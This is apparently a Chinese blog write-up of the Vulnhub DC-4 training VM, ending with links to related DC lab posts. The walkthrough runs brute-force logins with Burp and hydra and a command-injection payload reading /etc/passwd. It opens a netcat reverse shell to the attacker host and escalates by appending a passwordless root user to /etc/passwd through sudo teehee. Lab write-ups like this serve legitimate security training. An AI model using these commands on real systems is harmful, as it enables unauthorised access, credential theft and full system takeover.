看完这篇 教你玩转渗透测试靶机vulnhub——DC4

简介: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。

Vulnhub靶机DC4渗透测试详解

Vulnhub靶机介绍:

Vulnhub靶机下载:

Vulnhub靶机安装:

Vulnhub靶机漏洞详解:

①:信息收集:

②:暴力破解:

③:提权:

Vulnhub靶机渗透总结:

Vulnhub靶机介绍:

vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。


从靶机DC4靶机拿到shell 在提权,,,只有拿到root权限才可以发现最终的flag。


Vulnhub靶机下载:

官网地址:http://www.five86.com/downloads/DC-4.zip


Vulnhub靶机安装:

下载好了把安装包解压 然后试用VMware即可。




Vulnhub靶机漏洞详解:

①:信息收集:

kali里使用netdiscover发现主机


渗透机:kali IP :172.16.5.42 靶机IP :172.16.5.30


使用命令:nmap -sS -sV -A -n 172.16.5.30



开启了80和22端口,我们直接访问80端口 dirb 扫了一下没啥 可能就是暴力破解!!



②:暴力破解:

使用一个工具burp设置代理 然后抓个包 输入账号admin密码123456 发送到Intruder模块 设置一个字典 然后 线程设置2000 start attack




这里我们知道知道了密码:happy 成功登入!!



这里应该是个命令执行漏洞,pyload:radio=cat+/etc/passwd&submit=Run 查看用户,发现有三个普通用户:charles、jim、sam



nc -e /bin/bash/ 172.16.5.42 4444

1


使用nc -lvp 4444命令进行反弹,反弹成功 设置python交互 python3 -c "import pty;pty.spawn('/bin/bash')"


信息收集一下 uname -a 进入/home/ 进入/jim/cat test.sh


在backups 中发现了old-passwords.bak


把这个old-passwords.bak里面的复制到kali中然后新建一个字典jim.txt 吧


使用命令:hydra -l jim -P /root/桌面/jim.txt ssh://172.16.5.30



获得密码为:jibril04 登入ssh


登入提示:You have mail 让我们看邮寄 cd/var/mail 发现了jim里面有个Charles密码:^xHhA&hvim0y 尝试切换登入



提示我们使用teehee提权:sudo teehee --help



③:提权:

root权限免密码使用teehee ,teehee 是啥???太菜了不会 ,,,,,,学了半天


大概就是当发现有最追加写入文件功能的时候,直接往 /etc/passwd 里加个root用户


passwd的格式:[⽤户名]:[密码]:[UID]:[GID]:[⾝份描述]:[主⽬录]:[登录shell]


echo "axb::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

1


至此获取到了flag,渗透测试结束。


Vulnhub靶机渗透总结:

这是做的第五个靶场了,学习的知识点和一些细节就是 :

1.需要注意的细节就是bp抓包的时候不要发送到repeater,那个send和Forward不一样 这里卡了很久一直报错,然后没有回弹shell。


2.需要注意的还是python交互那个 容易打错,一定要细心在细心,我前面加了个python3就好

3.把这个old-passwords.bak里面的复制到kali这样才方便爆破 好像下载不了只能复制(我比较菜就只能这样做了)

4.还有个小失误就是 jim里面有个charles用户 我ssh登入的时候 写的是大写的登了半天没进去(气死我了,还是要多细心呀!!)

5.想感慨一下,因为是第一次做 每次都会发现新问题然后去解决 对自己也挺好的 收获也挺多的 多去尝试就好啦!加油!!


新知识点:

①:学习了hydra (九头蛇)工具的使用

②学习了teehee 提权

最后 自己也会把这系列的靶机继续更新,创作不易 希望对大家有所帮助!!


相关文章
|
3月前
|
SQL 安全 Shell
vulnhub靶机实战_DC-3
本文介绍DC-3靶机渗透测试全过程,涵盖环境搭建、信息扫描、SQL注入、权限提升等环节。通过Joomla漏洞获取管理员密码,上传木马并提权至root,最终获取flag,是一套完整的渗透实战流程。
736 1
|
3月前
|
SQL Shell 网络安全
vulnhub靶机实战_DC-8
本文介绍DC-8靶机渗透全过程,涵盖环境搭建、信息扫描、SQL注入、密码爆破、反向Shell获取及提权。利用sqlmap与john工具破解用户凭据,通过Web表单执行命令并获取root权限,最终读取flag完成渗透测试。
355 0
|
3月前
|
关系型数据库 MySQL 网络安全
vulnhub靶机实战_DC-7
本文介绍DC-7靶机渗透测试全过程,包括靶机下载、VMware导入、网络配置、Nmap扫描发现开放80和22端口,通过信息搜集获取数据库凭证,尝试登录SSH成功,获得系统访问权限。适合网络安全学习者实践渗透流程。
156 0
|
3月前
|
中间件 测试技术 应用服务中间件
vulnhub靶机实战_DC-5
本教程介绍如何下载并配置DC-5靶机进行安全测试。内容包括靶机下载链接、VMware导入步骤、网络设置及Nmap扫描分析,帮助快速搭建渗透测试环境。
234 0
|
3月前
|
存储 安全 Shell
vulnhub靶机实战_DC-4
本文介绍了DC-4靶机渗透测试的完整过程,包括靶机下载、环境搭建、信息扫描、漏洞利用、提权以及最终获取flag的详细步骤。通过使用工具如nmap、Hydra进行端口扫描与密码爆破,结合反向Shell与teehee命令实现权限提升,最终成功获取系统flag。内容详实,适合网络安全学习与实践。
460 0
vulnhub靶机实战_DC-4
|
3月前
|
安全 网络安全 开发工具
vulnhub靶机实战_DC-2
本文介绍了DC-2靶机的渗透测试实战过程,涵盖靶机下载、环境搭建、信息扫描、漏洞利用、权限提升及最终提权获取flag的完整流程。内容包括使用nmap扫描、WPScan和Hydra工具爆破登录信息,绕过rbash限制,利用git提权等关键技术步骤。
173 0
|
3月前
|
安全 网络安全 数据库
vulnhub靶机实战_DC-1
本实验通过启动靶机、扫描漏洞、攻击Drupal服务、获取数据库权限、提权至root,最终成功获取所有flag,完成渗透测试目标。
263 0
vulnhub靶机实战_DC-1
|
安全 Linux 网络安全
Neos的渗透测试靶机练习——DC-3
Neos的渗透测试靶机练习——DC-3
181 4
|
3月前
|
存储 安全 Linux
Kali Linux 2025.3 发布 (Vagrant & Nexmon) - 领先的渗透测试发行版
Kali Linux 2025.3 发布 (Vagrant & Nexmon) - 领先的渗透测试发行版
531 0
|
6月前
|
存储 安全 Linux
Kali Linux 2025.2 发布 (Kali 菜单焕新、BloodHound CE 和 CARsenal) - 领先的渗透测试发行版
Kali Linux 2025.2 发布 (Kali 菜单焕新、BloodHound CE 和 CARsenal) - 领先的渗透测试发行版
336 0